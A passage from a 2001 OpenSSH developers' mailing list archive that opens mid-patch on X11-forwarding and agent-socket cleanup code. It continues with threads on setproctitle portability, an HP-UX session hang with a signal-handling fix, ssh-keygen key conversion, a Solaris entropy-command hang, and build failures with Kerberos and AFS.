packet_disconnect("socket: %.100s", strerror(saved)); - } + /* delete agent socket on fatal() */ + fatal_add_cleanup(auth_sock_cleanup_proc, pw); + /* Create the socket. */ sock = socket(AF_UNIX, SOCK_STREAM, 0); if (sock < 0) Index: channels.h =================================================================== RCS file: /home/markus/cvs/ssh/channels.h,v retrieving revision 1.31 diff -u -r1.31 channels.h --- channels.h 2001/04/13 22:46:53 1.31 +++ channels.h 2001/06/05 14:37:23 @@ -293,6 +293,8 @@ */ char *auth_get_socket_name(void); +void auth_sock_cleanup_proc(void *_pw); + /* * This is called to process SSH_CMSG_AGENT_REQUEST_FORWARDING on the server. * This starts forwarding authentication requests. Index: session.c =================================================================== RCS file: /home/markus/cvs/ssh/session.c,v retrieving revision 1.74 diff -u -r1.74 session.c --- session.c 2001/04/17 19:34:25 1.74 +++ session.c 2001/06/05 14:39:54 @@ -89,12 +89,15 @@ void session_set_fds(Session *s, int fdin, int fdout, int fderr); void session_pty_cleanup(Session *s); void session_proctitle(Session *s); +int session_setup_x11fwd(Session *s); +void session_close(Session *s); void do_exec_pty(Session *s, const char *command); void do_exec_no_pty(Session *s, const char *command); void do_login(Session *s, const char *command); void do_child(Session *s, const char *command); void do_motd(void); int check_quietlogin(Session *s, const char *command); +void xauthfile_cleanup_proc(void *pw); void do_authenticated1(Authctxt *authctxt); void do_authenticated2(Authctxt *authctxt); @@ -154,18 +157,26 @@ do_authenticated2(authctxt); else do_authenticated1(authctxt); + + /* remote user's local Xauthority file and agent socket */ + if (xauthfile) + xauthfile_cleanup_proc(authctxt->pw); + if (auth_get_socket_name()) + auth_sock_cleanup_proc(authctxt->pw); } /* * Remove local Xauthority file. */ void -xauthfile_cleanup_proc(void *ignore) +xauthfile_cleanup_proc(void *_pw) { - debug("xauthfile_cleanup_proc called"); + struct passwd *pw = _pw; + char *p; + debug("xauthfile_cleanup_proc called"); if (xauthfile != NULL) { - char *p; + temporarily_use_uid(pw); unlink(xauthfile); p = strrchr(xauthfile, '/'); if (p != NULL) { @@ -174,6 +185,7 @@ } xfree(xauthfile); xauthfile = NULL; + restore_uid(); } } @@ -209,7 +221,7 @@ { Session *s; char *command; - int success, type, fd, n_bytes, plen, screen_flag, have_pty = 0; + int success, type, n_bytes, plen, screen_flag, have_pty = 0; int compression_level = 0, enable_compression_after_reply = 0; u_int proto_len, data_len, dlen; @@ -290,22 +302,6 @@ break; case SSH_CMSG_X11_REQUEST_FORWARDING: - if (!options.x11_forwarding) { - packet_send_debug("X11 forwarding disabled in server configuration file."); - break; - } - if (!options.xauth_location) { - packet_send_debug("No xauth program; cannot forward with spoofing."); - break; - } - if (no_x11_forwarding_flag) { - packet_send_debug("X11 forwarding not permitted for this authentication."); - break; - } - debug("Received request for X11 forwarding with auth spoofing."); - if (s->display != NULL) - packet_disconnect("Protocol error: X11 display already set."); - s->auth_proto = packet_get_string(&proto_len); s->auth_data = packet_get_string(&data_len); @@ -325,31 +321,11 @@ 4 + proto_len + 4 + data_len, type); s->screen = 0; } - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); - - if (s->display == NULL) - break; - - /* Setup to always have a local .Xauthority. */ - xauthfile = xmalloc(MAXPATHLEN); - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); - temporarily_use_uid(s->pw); - if (mkdtemp(xauthfile) == NULL) { - restore_uid(); - error("private X11 dir: mkdtemp %s failed: %s", - xauthfile, strerror(errno)); - xfree(xauthfile); - xauthfile = NULL; - /* XXXX remove listening channels */ - break; + success = session_setup_x11fwd(s); + if (!success) { + xfree(s->auth_proto); + xfree(s->auth_data); } - strlcat(xauthfile, "/cookies", MAXPATHLEN); - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) - close(fd); - restore_uid(); - fatal_add_cleanup(xauthfile_cleanup_proc, NULL); - success = 1; break; case SSH_CMSG_AGENT_REQUEST_FORWARDING: @@ -402,9 +378,7 @@ if (command != NULL) xfree(command); - /* Cleanup user's local Xauthority file. */ - if (xauthfile) - xauthfile_cleanup_proc(NULL); + session_close(s); return; default: @@ -1372,23 +1346,7 @@ int session_x11_req(Session *s) { - int fd; - if (no_x11_forwarding_flag) { - debug("X11 forwarding disabled in user configuration file."); - return 0; - } - if (!options.x11_forwarding) { - debug("X11 forwarding disabled in server configuration file."); - return 0; - } - if (xauthfile != NULL) { - debug("X11 fwd already started."); - return 0; - } - - debug("Received request for X11 forwarding with auth spoofing."); - if (s->display != NULL) - packet_disconnect("Protocol error: X11 display already set."); + int success; s->single_connection = packet_get_char(); s->auth_proto = packet_get_string(NULL); @@ -1396,33 +1354,12 @@ s->screen = packet_get_int(); packet_done(); - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); - if (s->display == NULL) { + success = session_setup_x11fwd(s); + if (!success) { xfree(s->auth_proto); xfree(s->auth_data); - return 0; } - xauthfile = xmalloc(MAXPATHLEN); - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); - temporarily_use_uid(s->pw); - if (mkdtemp(xauthfile) == NULL) { - restore_uid(); - error("private X11 dir: mkdtemp %s failed: %s", - xauthfile, strerror(errno)); - xfree(xauthfile); - xauthfile = NULL; - xfree(s->auth_proto); - xfree(s->auth_data); - /* XXXX remove listening channels */ - return 0; - } - strlcat(xauthfile, "/cookies", MAXPATHLEN); - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); - if (fd >= 0) - close(fd); - restore_uid(); - fatal_add_cleanup(xauthfile_cleanup_proc, s); - return 1; + return success; } int @@ -1636,6 +1573,10 @@ void session_close(Session *s) { + if (s->display) { + xauthfile_cleanup_proc(s->pw); + fatal_remove_cleanup(xauthfile_cleanup_proc, s->pw); + } session_pty_cleanup(s); session_free(s); session_proctitle(s); @@ -1710,11 +1651,57 @@ setproctitle("%s@%s", s->pw->pw_name, session_tty_list()); } +int +session_setup_x11fwd(Session *s) +{ + int fd; + struct stat st; + + if (no_x11_forwarding_flag) { + packet_send_debug("X11 forwarding disabled in user configuration file."); + return 0; + } + if (!options.x11_forwarding) { + debug("X11 forwarding disabled in server configuration file."); + return 0; + } + if (!options.xauth_location || + (stat(options.xauth_location, &st) == -1)) { + packet_send_debug("No xauth program; cannot forward with spoofing."); + return 0; + } + if (s->display != NULL) { + debug("X11 display already set."); + return 0; + } + xauthfile = xmalloc(MAXPATHLEN); + strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); + temporarily_use_uid(s->pw); + if (mkdtemp(xauthfile) == NULL) { + restore_uid(); + error("private X11 dir: mkdtemp %s failed: %s", + xauthfile, strerror(errno)); + xfree(xauthfile); + xauthfile = NULL; + return 0; + } + strlcat(xauthfile, "/cookies", MAXPATHLEN); + fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); + if (fd >= 0) + close(fd); + restore_uid(); + s->display = x11_create_display_inet(s->screen, options.x11_display_offset); + if (s->display == NULL) { + xauthfile_cleanup_proc(s->pw); + return 0; + } + fatal_add_cleanup(xauthfile_cleanup_proc, s->pw); + return 1; +} + void do_authenticated2(Authctxt *authctxt) { server_loop2(); - if (xauthfile) - xauthfile_cleanup_proc(NULL); } From Darren.Moffat at eng.sun.com Wed Jun 6 06:25:47 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Tue, 5 Jun 2001 13:25:47 -0700 (PDT) Subject: setproctitle Message-ID: <200106052027.f55KRKQ931331@jurassic.eng.sun.com> The portable OpenSSH source comes with an implementation of setproctitle() that on some systems (Solaris for example) does nothing. The current sendmail distributions have an alternate setproctitle() that tries to get the effect on a wide range of systems. Would there be any interest in a patch for the portable OpenSSH that uses the sendmail setproctitle as a starting point to get setproctitle functionality on more systems ? Note I haven't done the work yet, but wanted to know if there was interest first. -- Darren J Moffat From abush at microcenter.com Wed Jun 6 07:30:45 2001 From: abush at microcenter.com (Aaron Bush) Date: Tue, 05 Jun 2001 17:30:45 -0400 Subject: HPUX: ssh hangs after shell exit Message-ID: <3B1D4F85.FEF10A43@mail.microcenter.com> I am aware that there have been several posts related to ssh connections hanging, i have tried to read through most of them in the archives... I am posting this in hopes that it may present something new that will further help resolve this problem. The problem i am having appears to be similar to what others have reported where after typing exit in an interactive shell the connection is not closed unitl an additional _one_ key stroke is issued (space-bar, enter, etc...). The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and FreeBSD-4.2. The behavior so far is _always_ consistent: 1) establish connection to sshd using ssh simply via "ssh remote-host" 2) type exit in interactive shell on remote-host. 3) "logout" is echoed to the terminal and the local shell prompt is NOT echoed. 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS HERE 5) "Connection to remote-host closed." is echoed to the terminal followed by the local shell prompt. If i do a ps from another session on the remote-host (HPUX-11.00) before doing step 4 from above (hitting space-bar) this is what i see (cleaned-up to removed non-related processes): ---- sysadm$ ps -ef|grep abush UID PID PPID C STIME TTY TIME COMMAND root 20088 15876 0 17:49:31 ? 0:00 sshd: abush at 4 abush 20090 20088 0 17:49:32 ? 0:00 ---- An additional problem that appears to be realted to this is (but does not happen 100% of the time) is that a scp of a file from a HPUX-11.00 sshd server will hang indefinitely. Looking at the same ps output will show the same process again. ---- The problem is only seen when the sshd server is running on HPUX, connections betweeen other hosts respond as expected. I can also provide output from sshd -d and ssh -v -v -v if needed and anything else that might help to clear this up. Thanks, -ab From mouring at etoh.eviladmin.org Wed Jun 6 08:06:28 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Tue, 5 Jun 2001 17:06:28 -0500 (CDT) Subject: setproctitle In-Reply-To: <200106052027.f55KRKQ931331@jurassic.eng.sun.com> Message-ID: It has been talked about in the past, but no one has gone out of their way to actually do the work. It would be nice if setproctitle() worked on majority of the platforms instead of on just one or two. Just for some of us.. it's well.=) Not been a high priority item. I'm willing to accept a patch to fix this. - Ben On Tue, 5 Jun 2001, Darren Moffat wrote: > The portable OpenSSH source comes with an implementation of > setproctitle() that on some systems (Solaris for example) does nothing. > The current sendmail distributions have an alternate setproctitle() > that tries to get the effect on a wide range of systems. > > Would there be any interest in a patch for the portable OpenSSH that > uses the sendmail setproctitle as a starting point to get setproctitle > functionality on more systems ? > > Note I haven't done the work yet, but wanted to know if there was > interest first. > > -- > Darren J Moffat > > From stevesk at pobox.com Wed Jun 6 08:46:57 2001 From: stevesk at pobox.com (Kevin Steves) Date: Tue, 5 Jun 2001 15:46:57 -0700 (PDT) Subject: setproctitle In-Reply-To: <200106052027.f55KRKQ931331@jurassic.eng.sun.com> Message-ID: On Tue, 5 Jun 2001, Darren Moffat wrote: :The portable OpenSSH source comes with an implementation of :setproctitle() that on some systems (Solaris for example) does nothing. :The current sendmail distributions have an alternate setproctitle() :that tries to get the effect on a wide range of systems. it only works on hp-ux right now, which uses pstat(2) for command string. i looked at sendmail's code before deciding it was cleaner and easier to start with openbsd setproctitle.c and add title methods as needed and as they were understood. and i don't know what issues there might be with sendmail's license. From stevesk at pobox.com Wed Jun 6 09:03:24 2001 From: stevesk at pobox.com (Kevin Steves) Date: Tue, 5 Jun 2001 16:03:24 -0700 (PDT) Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com> Message-ID: On Tue, 5 Jun 2001, Aaron Bush wrote: :The problem i am having appears to be similar to what others have :reported where after typing exit in an interactive shell the connection :is not closed unitl an additional _one_ key stroke is issued (space-bar, :enter, etc...). : :The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting :using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and :FreeBSD-4.2. The behavior so far is _always_ consistent: : :1) establish connection to sshd using ssh simply via "ssh remote-host" :2) type exit in interactive shell on remote-host. :3) "logout" is echoed to the terminal and the local shell prompt is NOT :echoed. :4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS :HERE :5) "Connection to remote-host closed." is echoed to the terminal :followed by the local shell prompt. can you try the patch at the end? hp-ux (and possibly the other systems you mentioned) restart select() when SA_RESTART which we were setting for SIGCHLD, and we should not have select() restarted. i would also be interested in someone with Unixware trying this so we can further verify issues with grantpt(), which is why we added the restart code in the first place. :If i do a ps from another session on the remote-host (HPUX-11.00) before :doing step 4 from above (hitting space-bar) this is what i see :(cleaned-up to removed non-related processes): :---- :sysadm$ ps -ef|grep abush : UID PID PPID C STIME TTY TIME COMMAND : root 20088 15876 0 17:49:31 ? 0:00 sshd: abush at 4 : abush 20090 20088 0 17:49:32 ? 0:00 : :---- :An additional problem that appears to be realted to this is (but does :not happen 100% of the time) is that a scp of a file from a HPUX-11.00 :sshd server will hang indefinitely. Looking at the same ps output will :show the same process again. i'm not positive, but i think this will fix that issue as well. :The problem is only seen when the sshd server is running on HPUX, :connections betweeen other hosts respond as expected. : :I can also provide output from sshd -d and ssh -v -v -v if needed and :anything else that might help to clear this up. Index: misc.c =================================================================== RCS file: /var/cvs/openssh/misc.c,v retrieving revision 1.20 diff -u -r1.20 misc.c --- misc.c 2001/05/12 00:08:38 1.20 +++ misc.c 2001/06/05 20:55:54 @@ -220,7 +220,7 @@ memset(&sa, 0, sizeof(sa)); sigemptyset(&sa.sa_mask); sa.sa_flags = 0; -#if defined(SA_RESTART) +#if 0 if (sig == SIGCHLD) sa.sa_flags |= SA_RESTART; #endif From liblit at eecs.berkeley.edu Wed Jun 6 11:21:46 2001 From: liblit at eecs.berkeley.edu (Ben Liblit) Date: Tue, 05 Jun 2001 18:21:46 -0700 Subject: ssh-keygen key conversion questions Message-ID: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Using ssh-keygen from OpenSSH-2.9p1, I can perform the following key conversions: - convert a commercial public key into an OpenSSH public key: % ssh-keygen -i -f commercial-key.pub > openssh-key.pub - convert a commercial private key into an OpenSSH private key, provided that the commercial key has no password % ssh-keygen -i -f commercial-key > openssh-key - convert an OpenSSH public key into a commercial public key: % ssh-keygen -e -f openssh-key.pub > commercial-key.pub % ssh-keygen -e -f openssh-key > commercial-key.pub (these both do the same thing) I am left with two questions. First, the inability to convert encrypted commercial keys into similarly encrypted OpenSSH keys is unfortunate. Can anyone give me the standard story on why this doesn't work as one might hope? Is it simply a feature that is waiting to be implemented, or are there deeper intractable issues? Second, there is one conversion path missing. How does one convert an OpenSSH private key into a commercial private key? Thank you! From djm at mindrot.org Wed Jun 6 13:12:47 2001 From: djm at mindrot.org (Damien Miller) Date: Wed, 6 Jun 2001 13:12:47 +1000 (EST) Subject: ssh-keygen key conversion questions In-Reply-To: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Message-ID: On Tue, 5 Jun 2001, Ben Liblit wrote: > I am left with two questions. First, the inability to convert > encrypted commercial keys into similarly encrypted OpenSSH keys is > unfortunate. Can anyone give me the standard story on why this > doesn't work as one might hope? Is it simply a feature that is > waiting to be implemented, or are there deeper intractable issues? > > Second, there is one conversion path missing. How does one convert an > OpenSSH private key into a commercial private key? We don't know what format ssh.com uses to store their private keys and no one has come forward to reverse engineer it. -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 18:13:58 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 6 Jun 2001 10:13:58 +0200 Subject: ssh-keygen key conversion questions In-Reply-To: <3B1D85AA.91AA2E8F@eecs.berkeley.edu>; from liblit@eecs.berkeley.edu on Tue, Jun 05, 2001 at 06:21:46PM -0700 References: <3B1D85AA.91AA2E8F@eecs.berkeley.edu> Message-ID: <20010606101358.C18811@faui02.informatik.uni-erlangen.de> On Tue, Jun 05, 2001 at 06:21:46PM -0700, Ben Liblit wrote: > Using ssh-keygen from OpenSSH-2.9p1, I can perform the following key > conversions: > > - convert a commercial public key into an OpenSSH public key: > > % ssh-keygen -i -f commercial-key.pub > openssh-key.pub > > - convert a commercial private key into an OpenSSH private key, > provided that the commercial key has no password > > % ssh-keygen -i -f commercial-key > openssh-key > > - convert an OpenSSH public key into a commercial public key: > > % ssh-keygen -e -f openssh-key.pub > commercial-key.pub > % ssh-keygen -e -f openssh-key > commercial-key.pub > > (these both do the same thing) > > I am left with two questions. First, the inability to convert > encrypted commercial keys into similarly encrypted OpenSSH keys is > unfortunate. Can anyone give me the standard story on why this > doesn't work as one might hope? show us patches :) i have no idea how they encrypt the key. however, you can still decrypt the key using the commercial software. > Is it simply a feature that is > waiting to be implemented, or are there deeper intractable issues? i won't implement this. > Second, there is one conversion path missing. How does one convert an > OpenSSH private key into a commercial private key? no documentation, no code. i think openssh's keygen has all features needed for migrating to openssh. -m From c.bailiff at devsecure.com Wed Jun 6 18:38:01 2001 From: c.bailiff at devsecure.com (Cris Bailiff) Date: Wed, 06 Jun 2001 18:38:01 +1000 Subject: ssh_prng_cmds on Solaris Message-ID: <3B1DEBE9.9D2B5874@devsecure.com> Hi, I'm trying to build an openssh pkgadd package which is portable across Solaris 2.6,7 & 8, so I can't rely on /dev/random support and must instead fall back to ssh_prng_cmds for collecting entropy. One of the default commands in ssh_prng_cmds "arp -a -n" is a problem for any (2.6, at least) host which doesn't have an efficient/working DNS or other name resolution system - basically, without name service, this command hangs for a very long time, so effectively DoS'ing the sshd. The problem is that 'arp -a' doesn't seem to recognise '-n', and arp desparately wants to resolve (at least) 224.0.0.0 (the interface multicast address). The command doesn't add much entropy either, as apart from the long wait, its output is the same as "netstat -pn" two lines above (which does understand '-n' and doesn't hang on DNS). Off course I can 'fix' it locally (remove it), and put the fix in my package, but I thought I should report it here in the hope that its 'fixed' properly in a future release, and I have one less local patch to worry about. Hopefully, this note in the archive might help some other poor solaris user out in future too.. Cris c.bailiff at devsecure.com From atossava at cc.helsinki.fi Wed Jun 6 21:31:58 2001 From: atossava at cc.helsinki.fi (Atro Tossavainen) Date: Wed, 6 Jun 2001 14:31:58 +0300 (EET DST) Subject: Failure to compile OpenSSH. Message-ID: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Hello guys. Following Dug's withdrawal of the SSH1 AFS patches, I'm trying to give OpenSSH installation another shot. It fails. The setting: * Platforms: Linux (Immunix 6.2), Solaris 7, IRIX 6.5, OSF1 4.0F, HP-UX 10.20. * Compilers: StackGuard egcs on Linux, vendor-supplied native on others (Workshop 5.0 Sun; MIPSpro 7.3 SGI; OSFCMPLRS440 package; HP ANSI C compiler B3899BA B.10.20.07) * Kerberos: KTH krb4 1.0.8 on all platforms, installed on AFS, /usr/athena linked to /afs/biocenter.helsinki.fi/v/@sys/libraries/kth-krb4/latest on all * AFS: AFS 3.6 Patch #2 (Base configuration 2.14) on all but HP-UX (3.4a). * Zlib: 1.1.3 on all platforms. Installed locally on IRIX and Linux, on AFS on others. -I and -L given in CFLAGS and LDFLAGS where needed. * OpenSSL: 0.9.6a on all platforms, installed on AFS, at /afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest * Configure line: ./configure --with-ssl-dir=/afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest --with-kerberos4=/usr/athena --with-afs=/usr/afsws Results: Linux: Configure fails to find OpenSSL. (1) Solaris: Configure fails to find OpenSSL. (2) SGI: Configure fails to find OpenSSL. (3) Alpha: Configure succeeds, build fails. (4) HP: Configure succeeds, build fails. (5) (1) configure:4411: gcc -o conftest -g -O2 -Wall -I/afs/bi/v/@sys/libraries/openssl/latest/include -L/afs/bi/v/@sys/libraries/openssl/latest/lib conftest.c -lz -lnsl -lutil -lcrypto 1>&5 /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_load': dso_dlfcn.o(.text+0x9e): undefined reference to `dlopen' dso_dlfcn.o(.text+0xb4): undefined reference to `dlopen' dso_dlfcn.o(.text+0x10a): undefined reference to `dlclose' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_var': dso_dlfcn.o(.text+0x1f3): undefined reference to `dlsym' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_func': dso_dlfcn.o(.text+0x2f3): undefined reference to `dlsym' /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dso_dlfcn.o): In function `dlfcn_unload': dso_dlfcn.o(.text+0x472): undefined reference to `dlclose' collect2: ld returned 1 exit status (2) configure:4354: checking for OpenSSL directory configure:4411: cc -o conftest -I/afs/bi/p/include -I/afs/bi/v/@sys/libraries/openssl/latest/include -I/usr/local/include -R/afs/bi/v/@sys/libraries/openssl/latest/lib -L/afs/bi/v/@sys/libraries/openssl/latest/lib -L/afs/bi/p/lib -ldl -L/usr/local/lib -R/usr/local/lib conftest.c -lz -lsocket -lnsl -lgen -lcrypto 1>&5 configure: failed program was: #line 4397 "configure" #include "confdefs.h" #include #include int main(void) { char a[2048]; memset(a, 0, sizeof(a)); RAND_add(a, sizeof(a), sizeof(a)); return(RAND_status() <= 0); } (3) configure:4354: checking for OpenSSL directory configure:4411: cc -o conftest -g -I/usr/local/include conftest.c -lz -lgen -lcrypto 1>&5 cc-1005 cc: ERROR File = configure, Line = 4400 The source file "openssl/rand.h" is unavailable. #include ^ 1 catastrophic error detected in the compilation of "conftest.c". Compilation terminated. configure: failed program was: #line 4397 "configure" #include "confdefs.h" #include #include int main(void) { char a[2048]; memset(a, 0, sizeof(a)); RAND_add(a, sizeof(a), sizeof(a)); return(RAND_status() <= 0); } (4) cc: Info: /usr/athena/include/ktypes.h, line 18: In this declaration, "u_int32_t" has a duplicate typedef at line number 189 in file defines.h. This might not be portable. (duptypedef) typedef unsigned int u_int32_t; /* 32 bits */ ---------------------^ gmake: *** [radix.o] Error 1 (5) cc -Ae -I/afs/bi/p/include -Ae -I. -I.. -I. -I./.. -I/afs/bi/v/@sys/libraries/openssl/latest/include -D_HPUX_SOURCE -I/usr/athena/include -I/usr/afsws/include -DHAVE_CONFIG_H -c strmode.c cc: "../openbsd-compat/glob.h", line 48: warning 617: Redeclaration of tag "stat" ignored. cc: "strmode.c", line 45: error 1711: Inconsistent parameter list declaration for "strmode". gmake[1]: *** [strmode.o] Error 1 gmake[1]: Leaving directory `/scratch/openssh-2.9p1/openbsd-compat' gmake: *** [openbsd-compat/libopenbsd-compat.a] Error 2 -- Atro Tossavainen (Mr.) / The Institute of Biotechnology at Systems Analyst, Techno-Amish & / the University of Helsinki, Finland, +358-9-19158939 UNIX Dinosaur / employs me, but my opinions are my own. < URL : http : / / www . iki . fi / atro . tossavainen / > From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 22:35:39 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Wed, 6 Jun 2001 14:35:39 +0200 Subject: Failure to compile OpenSSH. In-Reply-To: <200106061131.f56BVxg16901@sirppi.helsinki.fi>; from atossava@cc.helsinki.fi on Wed, Jun 06, 2001 at 02:31:58PM +0300 References: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Message-ID: <20010606143539.A13062@faui02.informatik.uni-erlangen.de> On Wed, Jun 06, 2001 at 02:31:58PM +0300, Atro Tossavainen wrote: > Linux: Configure fails to find OpenSSL. (1) i have seen this if libz.so is installed at strange places. does static linking work? From atossava at cc.helsinki.fi Wed Jun 6 23:14:49 2001 From: atossava at cc.helsinki.fi (Atro Tossavainen) Date: Wed, 6 Jun 2001 16:14:49 +0300 (EET DST) Subject: Failure to compile OpenSSH. In-Reply-To: <20010606143539.A13062@faui02.informatik.uni-erlangen.de> from Markus Friedl at "Jun 6, 2001 02:35:39 pm" Message-ID: <200106061314.f56DEn814890@sirppi.helsinki.fi> >> Linux: Configure fails to find OpenSSL. (1) > > i have seen this if libz.so is installed at strange places. > does static linking work? libz is installed where RedHat puts it, i.e. /usr/lib. Since this is with gcc, I tried with LDFLAGS="-static" ./configure --with-ssl-dir=/afs/biocenter.helsinki.fi/v/@sys/libraries/openssl/latest fails the same way. dso_dlfcn.o in OpenSSL libcrypto.a refers to the undefined functions dlopen, dlclose, dlsym. Explicitly including -ldl in LDFLAGS allowed configure to finish properly (without -static in LDFLAGS, I should probably add). Now, the build fails, with the following error messages: gcc -o ssh ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o -L. -Lopenbsd-compat/ -L/afs/bi/v/@sys/libraries/openssl/latest/lib -ldl -L/usr/athena/lib -L/usr/afsws/lib -lssh -lopenbsd-compat -lkafs -lresolv -ldes -lkrb -lz -lnsl -lutil -lcrypto -lcrypt -ldes /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_encrypt2': dx86-elf.o(.text+0x1040): multiple definition of `des_encrypt2' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:166: first defined here /usr/bin/ld: Warning: size of symbol `des_encrypt2' changed from 5153 to 3999 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_encrypt3': dx86-elf.o(.text+0x1fe0): multiple definition of `des_encrypt3' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:261: first defined here /usr/bin/ld: Warning: size of symbol `des_encrypt3' changed from 329 to 292 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_decrypt3': dx86-elf.o(.text+0x2110): multiple definition of `des_decrypt3' /usr/athena/lib/libdes.a(des_enc.o):/home/atossava/krb4-1.0.8/lib/des/./des_enc.c:284: first defined here /usr/bin/ld: Warning: size of symbol `des_decrypt3' changed from 329 to 292 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_ncbc_encrypt': dx86-elf.o(.text+0x2240): multiple definition of `des_ncbc_encrypt' /usr/athena/lib/libdes.a(ncbc_enc.o):/home/atossava/krb4-1.0.8/lib/des/ncbc_enc.c:68: first defined here /usr/bin/ld: Warning: size of symbol `des_ncbc_encrypt' changed from 1297 to 480 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(dx86-elf.o): In function `des_ede3_cbc_encrypt': dx86-elf.o(.text+0x2420): multiple definition of `des_ede3_cbc_encrypt' /usr/athena/lib/libdes.a(ede_enc.o):/home/atossava/krb4-1.0.8/lib/des/ede_enc.c:70: first defined here /usr/bin/ld: Warning: size of symbol `des_ede3_cbc_encrypt' changed from 1341 to 480 in dx86-elf.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o)(.data+0x0): multiple definition of `des_check_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:80: first defined here /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_set_odd_parity': set_key.o(.text+0x390): multiple definition of `des_set_odd_parity' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:80: first defined here /usr/bin/ld: Warning: size of symbol `des_set_odd_parity' changed from 97 to 125 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_is_weak_key': set_key.o(.text+0x4a0): multiple definition of `des_is_weak_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:137: first defined here /usr/bin/ld: Warning: size of symbol `des_is_weak_key' changed from 121 to 153 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_set_key': set_key.o(.text+0x540): multiple definition of `des_set_key' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:166: first defined here /usr/bin/ld: Warning: size of symbol `des_set_key' changed from 733 to 133 in set_key.o /afs/bi/v/@sys/libraries/openssl/latest/lib/libcrypto.a(set_key.o): In function `des_key_sched': set_key.o(.text+0x5d0): multiple definition of `des_key_sched' /usr/athena/lib/libdes.a(set_key.o):/home/atossava/krb4-1.0.8/lib/des/set_key.c:247: first defined here /usr/bin/ld: Warning: size of symbol `des_key_sched' changed from 73 to 133 in set_key.o collect2: ld returned 1 exit status make: *** [ssh] Error 1 -- Atro Tossavainen (Mr.) / The Institute of Biotechnology at Systems Analyst, Techno-Amish & / the University of Helsinki, Finland, +358-9-19158939 UNIX Dinosaur / employs me, but my opinions are my own. < URL : http : / / www . iki . fi / atro . tossavainen / > From janj-openssh at wenf.org Thu Jun 7 01:21:55 2001 From: janj-openssh at wenf.org (Jan Johansson) Date: Wed, 6 Jun 2001 17:21:55 +0200 Subject: Compile error 2.9p1 / Solaris 8 / Kerberos IV Message-ID: <20010606172153.X7465@the.placid.tv> Hello, trying to compile 2.9p1 on my Solaris 8 box [1]. I can compile without Kerberos but adding --with-kerberos4=/opt/KTHkrb4 it fails [2]. The build dir can be seen on http://www.isk.kth.se/~janj/openssh/ Is there something I can do to fix this? [1] SunOS nemesis 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10 [2] cc -g -I. -I../openssh-2.9p1 -I/opt/local/openssl/0.9.6/include -I/usr/local/include -I/opt/KTHkrb4/include -DETCDIR=\"/etc/ssh\" -D_PATH_SSH_PROGRAM=\"/opt/local/ssh/2.9p1/bin/ssh\" -D_PATH_SSH_ASKPASS_DEFAULT=\"/opt/local/ssh/2.9p1/libexec/ssh-askpass\" -D_PATH_SFTP_SERVER=\"/opt/local/ssh/2.9p1/libexec/sftp-server\" -D_PATH_SSH_PIDDIR=\"/var/run\" -DHAVE_CONFIG_H -c ../openssh-2.9p1/auth-passwd.c 